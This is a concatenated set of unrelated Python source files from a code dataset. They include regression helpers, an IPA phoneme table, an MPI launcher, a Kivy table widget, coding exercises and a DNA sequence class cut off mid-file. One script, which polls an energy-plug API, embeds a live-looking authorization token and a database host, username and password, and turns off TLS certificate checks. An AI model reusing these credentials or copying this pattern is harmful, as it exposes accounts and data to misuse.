aiohttp.TCPConnector(limit=MAX_CONNECTIONS)\n session = aiohttp.ClientSession(connector=connector)\n\n for batch in tqdm(range(math.ceil(len(image_urls) / BATCH_SIZE))):\n url_batch = image_urls[(batch * BATCH_SIZE):((batch + 1) * BATCH_SIZE)]\n responses = [adapter.make_request(session, image_url) for image_url in url_batch]\n for coroutine in async_tqdm.as_completed(responses):\n result = await coroutine\n results.append(result)\n\n await session.close()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run())\n\n with open(output_file, \"w\") as f:\n json.dump({\"results\": results}, f)\n\n\nif __name__ == \"__main__\":\n run_inference()\n","sub_path":"api_interfaces/local_inference/run_inference.py","file_name":"run_inference.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"81416590","text":"from sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nimport numpy as np\n\ndef train_model(model, parameter, X, y):\n grid_model = GridSearchCV(estimator=model,param_grid=parameter,scoring=\"r2\",cv=5)\n grid_model.fit(X,y)\n return grid_model.best_score_, grid_model.best_estimator_\n\n# Linear regression:\ndef linearRegression(X_train, X_dev, y_train, y_dev):\n from sklearn import linear_model\n print(\"Begin linear regression training...\")\n model_LinearRegression = linear_model.LinearRegression()\n model_LinearRegression.fit(X_train, y_train)\n y_pred = model_LinearRegression.predict(X_dev)\n RMSE = np.sqrt(mean_squared_error(y_pred, y_dev))\n\n print ('LogicalClassifier RMSE:', RMSE)\n\n return model_LinearRegression\n\n# Ridge regression:\ndef RidgeRegression(X, y):\n from sklearn import linear_model\n print(\"Begin Ridge regression training...\")\n alpha = np.logspace(-6,-1,10)\n parameter = dict(alpha=alpha)\n model = linear_model.Ridge() \n return train_model(model,parameter,X,y)\n\n# Lasso regression:\ndef LassoRegression(X, y):\n from sklearn import linear_model\n print(\"Begin Lasso regression training...\")\n alpha = np.logspace(-6,-1,10)#(?)\n parameter = dict(alpha=alpha)\n model = linear_model.Lasso()\n return train_model(model,parameter,X,y)\n\n# ElasticNet regression:\ndef ElasticNetRegression(X, y):\n from sklearn import linear_model\n print(\"Begin ElasticNet regression training...\")\n alpha = np.logspace(-6,-1,10)#(?)\n parameter = dict(alpha=alpha, l1_ratio=0.5)\n model = linear_model.ElasticNet()\n return train_model(model,parameter,X,y)\n\n# ExtraTree regression:\ndef ExtraTreeRegression(X, y):\n from sklearn.ensemble import BaggingRegressor\n from sklearn.tree import ExtraTreeRegressor\n print(\"Begin ExtraTree regression training...\")\n n_estimators = np.array([i for i in range(5,15)])\n parameter = dict(n_estimators=n_estimators)\n extra_tree = ExtraTreeRegressor(random_state=0)\n model = BaggingRegressor(extra_tree, random_state=0)\n\n return train_model(model,parameter,X,y)\n\n# Decision Tree regression:\ndef DecisionTreeregression(X, y):\n from sklearn import tree\n print(\"Begin Decision Tree regression training...\")\n max_depth = np.logspace(0,1,10)\n parameter = dict(max_depth=max_depth)\n model = tree.DecisionTreeRegressor()\n\n return train_model(model,parameter,X,y)\n\n# Random Forest regression:\ndef RandomForestregression():\n print(\"Begin Random Forest regression training...\")\n return 0\n\n# Gradient Boosting Random Forest Regression\ndef GradientBoostingRandomForestRegression():\n print(\"Begin Gradient Boosting Random Forest regression training...\")\n return 0\n","sub_path":"reg_alg.py","file_name":"reg_alg.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"376096203","text":"import csv\nimport re\n\ndef opener():\n f = open('zamok.txt','r', encoding = 'utf-8')\n text = f.read()\n f.close()\n return text\n\ndef name_search(x):\n print ('1. Найти и распечатать на экране все упоминания имен вида \"инициал + фамилия\" (например: Я. Меттенлейтер). \\n')\n list1 = []\n regex = re.findall('[^А-ЯЁ]([А-ЯЁ]\\. ?[А-ЯЁ][а-яё]+)', x)\n if regex:\n for one in regex:\n list1.append(one)\n for element in list1:\n print (element)\n print ('\\n')\n\ndef name_search2(y):\n print ('2. Найти в статье вообще все имена (инициалы + фамилия, например, В. И. Наливайко; имя + фамилия, например, Винченцо Бренна). При этом в найденное может попасть лишнее (например, Круглому Тронному), но не должно ничего теряться. \\n')\n list2 = []\n regex2 = re.findall('((?:[А-Я]\\. )+[А-ЯЁ][а-яё]+)', y)\n if regex2:\n for one in regex2:\n list2.append(one)\n for element in list2:\n print (element)\n \n regex3 = re.findall ('[А-Я][а-я]+ [А-Я][а-я]+',y)\n if regex3:\n for one in regex3:\n list2.append(one)\n for element in list2:\n print (element)\n return list2\n \ndef main(): \n name_search(opener())\n name_search2(opener())\n \n\nif __name__ == \"__main__\":\n main()\n\n#os.makedirs(papka)\n","sub_path":"Koshevoy_exam.py","file_name":"Koshevoy_exam.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"101085181","text":"# -*- coding: utf-8 -*-\n\ndef is_vowel(phoneme):\n return phoneme in IPA['vowels'].keys()\n\ndef ipa(word):\n return ''.join([_ipa_symbols(phoneme) for phoneme in word])\n\ndef _ipa_symbols(phoneme):\n return IPA['vowels'].get(phoneme) or IPA['consonants'].get(phoneme)\n\ndef destress(word):\n for character in \"012\":\n if character in word:\n word = word.replace(character, '')\n return word\n\ndef parse_syllables(phonemes):\n syllables = []\n syllable = []\n for phoneme in phonemes:\n syllable.append(phoneme)\n if is_vowel(phoneme) or phoneme == 'END_WORD' or phoneme == 'START_WORD':\n syllables.append(tuple(syllable))\n syllable = []\n\n return tuple(syllables)\n\ndef stress_level(syllable):\n vowel = syllable[-1]\n if '0' in vowel:\n return 'tertiary'\n elif '2' in vowel:\n return 'secondary'\n elif '1' in vowel:\n return 'primary'\n elif vowel == 'END_WORD':\n return 'end_word'\n elif vowel == 'START_WORD':\n return 'start_word'\n\ndef stress_symbol(level):\n return 'ˈ' if level == 'primary' else 'ˌ'\n\ndef clean_end_word_pseudovowel(unit, ignore_syllables):\n if ignore_syllables:\n return None if unit == 'END_WORD' else unit\n\n if unit[-1] == 'END_WORD':\n if len(unit) > 1:\n return unit[:-1]\n else:\n return None\n else:\n return unit\n\nIPA = {\n 'vowels': {\n 'AA': 'ɑ', 'AA1': 'ɑː', 'AA2': 'ɑ', 'AA0': 'ə',\n 'AE': 'æ', 'AE1': 'æ', 'AE2': 'æ', 'AE0': 'ə',\n 'AH': 'ʌ', 'AH1': 'ʌ', 'AH2': 'ʌ', 'AH0': 'ə',\n 'AO': 'ɔ', 'AO1': 'ɔː', 'AO2': 'ɔ', 'AO0': 'ə',\n 'AW': 'aʊ', 'AW1': 'aʊ', 'AW2': 'aʊ', 'AW0': 'ə',\n 'AY': 'aɪ', 'AY1': 'aɪ', 'AY2': 'aɪ', 'AY0': 'ɨ',\n 'EH': 'ɛ', 'EH1': 'ɛ', 'EH2': 'ɛ', 'EH0': 'ɨ',\n 'ER': 'ɚ', 'ER1': 'ɜːr', 'ER2': 'ɚ', 'ER0': 'ɚ',\n 'EY': 'eɪ', 'EY1': 'eɪ', 'EY2': 'eɪ', 'EY0': 'ɨ',\n 'IH': 'ɪ', 'IH1': 'ɪ', 'IH2': 'ɪ', 'IH0': 'ɨ',\n 'IY': 'i', 'IY1': 'iː', 'IY2': 'i', 'IY0': 'ɨ',\n 'OW': 'o', 'OW1': 'oʊ', 'OW2': 'o', 'OW0': 'ə',\n 'OY': 'ɔɪ', 'OY1': 'ɔɪ', 'OY2': 'ɔɪ', 'OY0': 'ɔɪ',\n 'UH': 'ʊ', 'UH1': 'ʊ', 'UH2': 'ʊ', 'UH0': 'ᵿ',\n 'UW': 'uː', 'UW1': 'uː', 'UW2': 'uː', 'UW0': 'u'\n },\n 'consonants': {\n 'B': 'b',\n 'CH': 't͡ʃ',\n 'D': 'd',\n 'DH': 'ð',\n 'F': 'f',\n 'G': 'g',\n 'HH': 'h',\n 'JH': 'd͡ʒ',\n 'K': 'k',\n 'L': 'l',\n 'M': 'm',\n 'N': 'n',\n 'NG': 'ŋ',\n 'P': 'p',\n 'R': 'r',\n 'S': 's',\n 'SH': 'ʃ',\n 'T': 't',\n 'TH': 'θ',\n 'V': 'v',\n 'W': 'w',\n 'Y': 'j',\n 'Z': 'z',\n 'ZH': 'ʒ'\n }\n}\n","sub_path":"lib/ipa.py","file_name":"ipa.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"24187567","text":"import os\nimport subprocess\nimport time\n\n\nSTARTUP_TIME = 3.0\n\n\nclass Launcher(object):\n \"\"\"\n execute mpirun cmd\n close process for mpirun\n \"\"\"\n def __init__(self, ports):\n self.port_list = ports\n self.mpirun_proc = None\n\n def launch(self):\n hetr_server_path = os.path.dirname(os.path.realpath(__file__)) + \"/hetr_server.py\"\n hetr_server_num = os.getenv('HETR_SERVER_NUM')\n hetr_server_gpu_num = os.getenv('HETR_SERVER_GPU_NUM')\n hetr_server_hostfile = os.getenv('HETR_SERVER_HOSTFILE')\n\n if (hetr_server_num is not None) & (hetr_server_hostfile is not None):\n # Assumption is that hydra_persist processes are started on remote nodes\n # Otherwise, remove \"-bootstrap persist\" from the command line (it then uses ssh)\n mpirun_str = \"mpirun -n %s -ppn 1 -bootstrap persist -hostfile %s %s\"\\\n % (hetr_server_num, hetr_server_hostfile, hetr_server_path)\n subprocess.call(mpirun_str, shell=True)\n elif (hetr_server_gpu_num is not None):\n cmd = ['mpirun',\n '--allow-run-as-root',\n '-n', hetr_server_gpu_num,\n 'python', hetr_server_path,\n '-p'] + self.port_list\n try:\n self.mpirun_proc = subprocess.Popen(cmd)\n time.sleep(STARTUP_TIME)\n except:\n raise RuntimeError(\"Process launch failed!\")\n\n def close(self):\n if self.mpirun_proc:\n self.mpirun_proc.terminate()\n time.sleep(STARTUP_TIME)\n if self.mpirun_proc:\n self.mpirun_proc.kill()\n self.mpirun_proc.wait()\n","sub_path":"ngraph/transformers/hetr/mpilauncher.py","file_name":"mpilauncher.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"496727666","text":"from kivy.lang import Builder\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.properties import DictProperty, NumericProperty, StringProperty, \\\n BooleanProperty, ObjectProperty\nfrom operator import itemgetter\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.label import Label\n\nBuilder.load_string(\"\"\"\n:\n bold: True\n on_press: self.data_table.sort_by(self.text)\n:\n background_down: self.background_normal\n:\n multiline: False\n on_focus: if not self.focus: self.data_table.data_update(self.id, self.text)\n:\n halign: 'left'\n:\n id: table_grid\n cols: self.ncol\n\"\"\")\n\nclass ColHeader(Button):\n #For some reason, adding this property as part of a\n #dynamic class declaration was failing.\n data_table = ObjectProperty(None)\n\nclass RowHeader(Button):\n data_table = ObjectProperty(None)\n initial_type = ObjectProperty(None)\n\nclass EditableCell(TextInput):\n data_table = ObjectProperty(None)\n initial_type = ObjectProperty(None)\n\nclass StaticCell(Label):\n data_table = ObjectProperty(None)\n initial_type = ObjectProperty(None)\n\n\nclass DataTable(GridLayout):\n \"\"\"This is a compound widget designed to display\n a dictionary of data as a nice table. The dictionary\n should have the column headers as keys, and then\n the associated value is a list of data for that\n column.\n\n You may have lists of different lengths, but the columns\n will fill from the top down; therefore, include blank\n strings as placeholders for any empty cells.\n\n Note that since the column headers are dict keys, you\n must have unique column names. Sorry...\"\"\"\n data = DictProperty({})\n ncol = NumericProperty(0)\n nrow = NumericProperty(0)\n editable = BooleanProperty(False)\n header_col = StringProperty('')\n\n def __init__(self, data = {}, editable = False, header_column = '',\n header_row = [], **kw):\n super(DataTable, self).__init__(**kw)\n self.data = data\n self.ncol = len(data)\n self.editable = editable\n self.header_col = header_column\n self.header_row = header_row\n celltype = EditableCell if self.editable else StaticCell\n self.nrow = max([len(data[x]) for x in data])\n self.cells = {}\n for key in self.header_row:\n cell_id = str(key)+'_head'\n cell = ColHeader(text = str(key), data_table = self, id = cell_id)\n self.cells[cell_id] = cell\n self.add_widget(cell)\n for i in range(self.nrow):\n get = itemgetter(i)\n for key in self.header_row:\n cell_id = str(key)+'_'+str(i)\n if i <= len(self.data[key]):\n text = get(self.data[key])\n else:\n text = ''\n self.data[key].append('')\n if key == self.header_col:\n self.cells[cell_id] = RowHeader(text = str(text), data_table = self,\n id = cell_id, initial_type = type(text))\n else:\n self.cells[cell_id] = celltype(text = str(text), data_table = self,\n id = cell_id, initial_type = type(text))\n self.add_widget(self.cells[cell_id])\n\n def data_update(self, cell_id, value):\n \"\"\"This will try to convert the value\n to the initial type of the data. If that fails,\n it'll just be a string. The initial type won't\n change, however.\"\"\"\n key, idx = cell_id.split('_')\n try:\n val = self.cells[cell_id].initial_type(value)\n except ValueError:\n val = value\n self.data[key][int(idx)] = val\n\n def sort_by(self, colname):\n column_to_order = enumerate(self.data[colname])\n sort_order = map(itemgetter(0),\n sorted(column_to_order, key=itemgetter(1)))\n for key in self.data:\n col = self.data[key]\n self.data[key] = [col[x] for x in sort_order]\n self.cells[str(key)+'_head'].background_color = (1, 1, 1, 1)\n for i in range(self.nrow):\n self.cells[str(key)+'_'+str(i)].text = str(self.data[key][i])\n self.cells[colname+'_head'].background_color = (0, 1, 0, 1)\n\nif __name__ == '__main__':\n import random\n data = {'Col1':[random.random() for x in range(10)],\n 'Col2':[random.random() for x in range(10)],\n 'Col3':[random.random() for x in range(10)],\n 'Col4':[random.random() for x in range(10)],\n 'Col5':[random.random() for x in range(10)]}\n from kivy.base import runTouchApp\n from kivy.uix.pagelayout import PageLayout\n from kivy.factory import Factory\n Builder.load_string(\"\"\"\n:\n canvas.before:\n Color:\n rgba: 0, 0, 0, 1\n Rectangle:\n pos: self.pos\n size: self.size\n \"\"\")\n\n pg = PageLayout()\n staticpage = Factory.Page(name='static')\n staticpage.add_widget(DataTable(name = 'static', data=data, header_column = 'Col1',\n header_row = ['Col'+str(x+1) for x in range(5)]))\n editpage = Factory.Page(name='edit')\n editpage.add_widget(DataTable(name = 'edit', data=data, header_column = 'Col5',\n header_row = ['Col'+str(5-x) for x in range(5)],\n editable = True))\n pg.add_widget(staticpage)\n pg.add_widget(editpage)\n runTouchApp(pg)\n","sub_path":"deepdiy/test/draft/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273513419","text":"\nclass Solution:\n def reverse(self, x: int) -> int:\n reverse = 0;\n val = abs(x)\n minus = 1\n if val != x:\n minus = -1\n val_s = str(val)\n i = len(val_s) - 1\n while i >= 0:\n reverse = reverse * 10 + int(val_s[i])\n i = i - 1\n if reverse >= pow(2,31):\n reverse = 0\n return reverse * minus\n\n\n\n\n\n\n\nx=120\nA=Solution()\nprint(A.reverse(x))","sub_path":"1-50/0007. Reverse Integer.py","file_name":"0007. Reverse Integer.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"144927399","text":"#!/usr/bin/env python\n#\nimport json\nimport arrow\nimport requests\nfrom time import sleep\n\nimport mysql.connector\nfrom datetime import time, date, timedelta, datetime\n\n#tocken = \"Mi45MTExOkVvbnN2ZXJpZ2Ux\"\n#plugid = \"101171\"\nimport os, time\nimport sys\n\ndef handelError ():\n\te = sys.exc_info()[0]\n\tpatch = \"/home/ec2-user/\"\n\tfilename = \"neurio-log.txt\"\n\tlogfile = open(patch+filename,'a+')\n\tprint (\"%s;%s\\n\" % (e,datetime.now()))\n\tlogfile.write (\"%s;%s\\n\" % (e,datetime.now()))\n\tlogfile.close ()\n\n\n\ndef set_TZ():\n\tos.environ['TZ'] = 'Europe/Berlin'\n\ttime.tzset()\n\t\n\ndef PlugWattNow (PlugID, Authorization):\n\tkoll_url_live = 'https://stagingapi.eon.se/eonapi/ODataProvider.svc/KwStreamLive?$filter=deviceId eq '\n\tnio_sens_id = PlugID\n\t\n\turl = koll_url_live + nio_sens_id\n\tres = requests.get(\n\t\t\turl\n\t\t\t,headers={\n\t\t\t'Authorization': Authorization,\n\t\t\t'Content-Type': 'application/json',\n\t\t\t'Accept': 'application/json'\n\t\t\t}\n\t\t\t,verify=False\n\t)\n\tjstr = json.dumps(res.json())\n\tjstr = json.loads(jstr)\n\t\n\tprint (jstr['d']['results'][0]['kw'])\n\treturn jstr['d']['results'][0]['kw']\n\t\n\t\ndef KollSendDataSQL (w,SensorID):\n\t\n\t# Open database connection\n\t#db = mysql.connector.connect(host='megatrenddb.ctcmpabozwdk.us-west-2.rds.amazonaws.com'\n\ttry:\n\t\tcnx = mysql.connector.connect(host='megatrenddb.ctcmpabozwdk.us-west-2.rds.amazonaws.com'\n\t\t\t\t\t\t\t,user='tryggel'\n\t\t\t\t\t\t\t,password='megatrend15'\n\t\t\t\t\t\t\t,database=''\n\t\t\t\t\t\t\t)\n\n\t\t# prepare a cursor object using cursor() method\n\t\tcursor = cnx.cursor()\n\t\t#DATETIME values in 'YYYY-MM-DD HH:MM:SS' format\n\n\t\tadd_reading = (\"INSERT INTO `mess_all`.`koll_all` \"\n\t\t\t\t \"(`w`, `SensorID`) \"\n\t\t\t\t \"VALUES (%s, %s)\")\n\t\t\t\t\t\n\t\tdata_readings = (w,SensorID)\n\t\tcursor.execute(add_reading, data_readings)\n\n\t\t# execute SQL query using execute() method.\n\t\t# Make sure data is committed to the database\n\t\tcnx.commit()\n\t\tcursor.close()\n\t\tcnx.close()\n\texcept mysql.connector.Error as err:\n\t\tprint(\"Something went wrong: {}\".format(err))\n\t\tpatch = \"/home/ec2-user/\"\n\t\tfilename = \"sqllogkoll.txt\"\n\t\tlogfile = open(patch+filename,'a+') \n\t\tlogfile.write ('%s;%s' % (err,datetime.now()))\n\ndef getingData():\n\ttocken = \"Mi45MTExOkVvbnN2ZXJpZ2Ux\"\n\tplugid = \"101171\"\n\tw = 0\n\ttimewait =0.0\n\twhile True:\n\t\ttime1 = datetime.now()\n\t\twait1 = time1\n\t\tw = PlugWattNow(plugid,tocken)\n\t\tprint (\"%ss\\tdone: requesting values.\" % ((datetime.now() -wait1).total_seconds()))\n\t\t#print (\"oDelta%s\"%oDelta)\n\t\twait1 = datetime.now()\n\t\tKollSendDataSQL(w,plugid)\n\t\tprint (\"%ss\\tdone: send to SQL.\" % ((datetime.now() -wait1).total_seconds()))\n\t\tprint ('W:%s;\\tT:%s;' %(\n\t\t\tw \t\n\t\t\t,datetime.now()\n\t\t\t)\n\t\t)\n\t\ttime2 = datetime.now()\n\t\ttimed = time2 - time1\n\t\ttimewait = 60 - timed.total_seconds()\n\t\ttimewait = max(timewait, 0)\n\t\twait1 = datetime.now()\n\t\tsleep(timewait)\n\t\tprint (\"%s\\tdone: waiting.\" % ((datetime.now() -wait1).total_seconds()))\n\ndef main():\n\ttry:\n\t\tset_TZ()\n\t\tgetingData()\n\texcept: \n\t\thandelError ()\n\t\tsleep(5)\n\t\tmain()\n\n\t\nmain()\n\n\n\n","sub_path":"Python 100Koll/100KollGet_Eye.py","file_name":"100KollGet_Eye.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617533223","text":"import climate\nimport os\nimport pandas as pd\nimport requests\nimport zipfile\n\nlogging = climate.get_logger('gtfs')\n\nURL = 'https://data.texas.gov/download/r4v4-vz24/application/zip'\nLOCAL = '/tmp/capmetro-stops.zip'\n\ndef download():\n if not os.path.exists(LOCAL):\n logging.info('retrieving data from %s', URL)\n s = requests.get(URL).content\n with open(LOCAL, 'wb') as h:\n h.write(s)\n logging.info('saved %d bytes to %s', len(s), LOCAL)\n\n\ndef parse():\n frames = {}\n with zipfile.ZipFile(LOCAL) as z:\n for info in z.filelist:\n key = info.filename.split('.')[0]\n with z.open(info) as h:\n frames[key] = pd.read_csv(h)\n for pk in (key + '_id', '{}_id'.format(key[:-1])):\n if pk in frames[key]:\n logging.info('%s: setting key %s', key, pk)\n frames[key] = frames[key].set_index(pk)\n break\n logging.info('%s: loaded %s: %d rows',\n LOCAL, key, len(frames[key]))\n return frames\n\n\ndef main():\n download()\n d = parse()\n for k, df in d.items():\n print(k, df)\n\n\nif __name__ == '__main__':\n climate.call(main)\n","sub_path":"metadata/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"481471101","text":"\nfrom django.contrib import admin\nfrom django.urls import path, include \nfrom . import views\n\napp_name=\"app\"\nurlpatterns = [\n path('', views.main, name='main' ),\n path('ajax_api_projectmake', views.projectmake, name='projectmake'),\n path('ajax_api_projectselect', views.projectselect, name='projectselect'),\n path('ajax_api_projectreturn', views.projectreturn, name='projectreturn'),\n path('ajax_api_projectdelete', views.projectdelete, name='projectdelete'),\n path('ajax_api_appdetermine', views.appdetermine, name='appdetermine'),\n path('ajax_api_appestablish', views.app_establish, name='app_establish'),\n]\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436502714","text":"from django.conf.urls.defaults import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\n#from django.contrib import admin\n#admin.autodiscover()\n\nurlpatterns = patterns('blogs.views',\n (r'^$', 'index'),\n (r'^(?P\\d+)/$', 'oneblog'),\n (r'^newblog/$', 'addblog'),\n (r'^(?P\\d+)/newentry/$', 'newentry'),\n (r'^(?P\\d+)/(?P\\d+)/$', 'oneentry'),\n (r'^(?P\\d+)/(?P\\d+)/editentry/$', 'editentry'),\n (r'^(?P\\d+)/(?P\\d+)/delete/$', 'deleteentry'),\n # Examples:\n # url(r'^$', 'mysite.views.home', name='home'),\n # url(r'^mysite/', include('mysite.foo.urls')),\n)\n\n#urlpatterns += patterns('',\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n# url(r'^admin/', include(admin.site.urls)),\n#)\n","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"494710256","text":"from datetime import datetime\nimport pytz\nfrom unittest import TestCase\nfrom raceflow import RaceFlowConverter\n\n\nclass Test(TestCase):\n\n def setUp(self):\n self.converter = RaceFlowConverter(datetime(2021, 8, 7, 7, tzinfo=pytz.UTC))\n\n def test_update_race_flow_empty(self):\n test_input = {1: {}}\n expected_output = '[]'\n test_output = self.converter.convert_flow_data(test_input)\n self.assertEqual(expected_output, test_output)\n\n def test_update_race_flow_simple(self):\n test_input = {'2': {'Alice': {1628319600: 0, 1628319750: 0.5, 1628319900: 1}}}\n expected_output = '[{\"name\": \"Alice\", \"initials\": \"A\", \"color\": \"#1f77b4\", \"groups\": \"P\", \"data\": [{\"x\": 0.0, \"y\": 0.0}, {\"x\": 0.5, \"y\": 0.0}, {\"x\": 1.0, \"y\": 0.0}]}]'\n test_output = self.converter.convert_flow_data(test_input)\n self.assertEqual(expected_output, test_output)\n","sub_path":"test_raceflow.py","file_name":"test_raceflow.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"600449846","text":"# You’re an engineer at a disruptive drone delivery startup and your CTO asks you to come up with an efficient\n# algorithm that calculates the minimum amount of energy required for the company’s drone to complete its flight. You\n# know that the drone burns 1 kWh (kilowatt-hour is an energy unit) for every mile it ascends, and it gains 1 kWh for\n# every mile it descends. Flying sideways neither burns nor adds any energy.\n#\n# Given an array route of 3D points, implement a function calcDroneMinEnergy that computes and returns the minimal\n# amount of energy the drone would need to complete its route. Assume that the drone starts its flight at the first\n# point in route. That is, no energy was expended to place the drone at the starting point.\n#\n# For simplicity, every 3D point will be represented as an integer array whose length is 3. Also, the values at\n# indexes 0, 1, and 2 represent the x, y and z coordinates in a 3D point, respectively.\n#\n# Explain your solution and analyze its time and space complexities.\n#\n# Example:\n#\n# input: route = [ [0, 2, 10],\n# [3, 5, 0],\n# [9, 20, 6],\n# [10, 12, 15],\n# [10, 10, 8] ]\n#\n# output: 5 # less than 5 kWh and the drone would crash before the finish\n# # line. More than `5` kWh and it’d end up with excess energy\n\n# GG: this is pretty straight forward once you realized vertical gains and losses will cancel themselves out,\n# only the highest and the starting z will contribute to the battery need\n\ndef calc_drone_min_energy(route):\n # sanity check\n\n res = 0\n min_res = 0\n\n zs = [z for [x, y, z] in route]\n\n for i in range(1, len(zs)):\n delta = zs[i - 1] - zs[i]\n res += delta\n if res < 0:\n min_res = min(min_res, res)\n\n return -min_res\n\n\nassert calc_drone_min_energy([[0, 2, 10], [3, 5, 0], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 5\nassert calc_drone_min_energy([[0, 2, 2], [3, 5, 38], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 36\nassert calc_drone_min_energy([[0, 2, 10], [3, 5, 9], [9, 20, 6], [10, 12, 2], [10, 10, 10], [10, 10, 2]]) == 0\n\n\ndef calc_drone_min_energy_ver_2(route):\n assert len(route) > 1\n\n return max([z for [_, _, z] in route[1:]]) - route[0][2]\n\n\nassert calc_drone_min_energy_ver_2([[0, 2, 10], [3, 5, 0], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 5\nassert calc_drone_min_energy_ver_2([[0, 2, 2], [3, 5, 38], [9, 20, 6], [10, 12, 15], [10, 10, 8]]) == 36\nassert calc_drone_min_energy_ver_2([[0, 2, 10], [3, 5, 9], [9, 20, 6], [10, 12, 2], [10, 10, 10], [10, 10, 2]]) == 0\n","sub_path":"pramp-session/pramp-24/DroneFlightBatteryPlanner.py","file_name":"DroneFlightBatteryPlanner.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"125418544","text":"#!/usr/bin/env python3\n# Challenge Question\n# 1. Create a method that can compare two DNA Sequence records and returns\n# True if they are the same or False if they are differet. Sameness is\n# based on name, organism, and seqeunce. All need to be the same for two\n# objects to be considered the same.\n\n\n# private unbound class function\ndef _wrap(linear_sequence, width=None):\n \"\"\"\n Input: (Required) A linear sequence string without any existing newline \n characters.\n (Optional) An integer `width` argument to specify the maximum\n line length to wrap the sequence flush to.\n \n Returns: A string of the input sequence, but with newline characters\n at fixed intervals specified by the `width` keyword argument.\n \"\"\"\n if width is None:\n width = sys.maxsize\n \n wrapped_sequence = ''\n linear_sequence_length = len(linear_sequence) # pre-calc it\n for offset in range(0, linear_sequence_length, width):\n if offset+width < linear_sequence_length:\n wrapped_sequence += linear_sequence[offset:(offset+width)] + \"\\n\"\n else:\n wrapped_sequence += linear_sequence[offset:linear_sequence_length]\n\n return wrapped_sequence\n\n# Our Sequence class will inheret generic object methods from the object\n# class\nclass Sequence(object): \n def __init__(self, name=None, sequence='', organism=None):\n \"\"\"\n Class constructor method for Sequence object. In order to create\n an instance (instantiate) an object from the Sequence class, call:\n Sequence(sequence_id, sequence_string [,organism=\"Org name\"]).\n \"\"\"\n self.name = name\n self.sequence = sequence\n self.organism = organism\n\n def length(self):\n \"\"\"Calc. the length of the sequence string\"\"\"\n return len(self.sequence)\n\n def nt_composition(self, fraction=False):\n \"\"\"Calc. the nucleotide composition of the sequence. The optional\n argument `fraction`, when set to `True` will return the fractional\n nucleotide composition\n \"\"\"\n nt_comp = {'A':0, 'T':0, 'G':0, 'C':0, 'N':0}\n for nt in self.sequence.upper():\n try:\n nt_comp[nt] += 1\n except KeyError:\n raise ValueError(\"Invalid DNA nucleotide character '{}'\".format(nt))\n\n if fraction:\n sequence_length = self.length()\n for nt in nt_comp:\n nt_comp[nt] = float(nt_comp[nt]) / sequence_length\n \n return nt_comp\n \n def gc_content(self):\n gc_chars = set('GCgc')\n gc_count = 0\n for nt in self.sequence:\n if nt in gc_chars:\n gc_count += 1\n\n return float(gc_count) / self.length()\n\n def __str__(self):\n \"\"\"\n This __str__ method allows object specific formatting, allowing us\n to use `str(record)` to return a formatted FASTA record.\n \"\"\"\n return \">{}{}\\n{}\\n\".format(\n self.name,\n '' if self.organism is None else ' [{}]'.format(self.organism),\n _wrap(self.sequence, width=50)\n )\n\n def __eq__(self, other):\n \"\"\"\n This __eq__ method allows us to use object specific comparisons and\n mathematical operators for equivalence, for example:\n \n record1 == record2 # returns True of the records are the same\n \"\"\"\n return self.name == other.name and \\\n self.organism == other.organism and \\\n self.sequence == other.sequence\n \n# If someone (accidentally?) tries to import this script, the following code\n# would get executed, which is not what we want. Writing the following line\n# protects against this because `__name__` will be assigned the module name\n# and not \"__main__\" as it is if this script is executed as a script:\nif __name__ == '__main__':\n # There are two ways we can set the name, organism, and sequence in\n # the Sequence object, we can set them with the Sequence() constructor, \n record1 = Sequence(\n \"U31202.1\",\n \"GAGCTCCGGCGGGTCAGCCGGACTGTCGGCTTCCCGGGGCATCTGGGTCCGGCGGGGCACAGCCCTGGGC\",\n \"Homo sapiens\"\n )\n # or we can set the Sequence object data via its attributes:\n record2 = Sequence()\n record2.name = \"NM_008711.2\"\n record2.sequence = \"AGACAAACCGGTGCCAACGTGCGCGGACGCCGCCGCCGCCACCGCCGCCACCGCCGCTGGAGTCCGCCGG\"\n record2.organism = \"Mus musculus\"\n\n # do a test print:\n print('ID: {}\\nORG: {}\\nLEN: 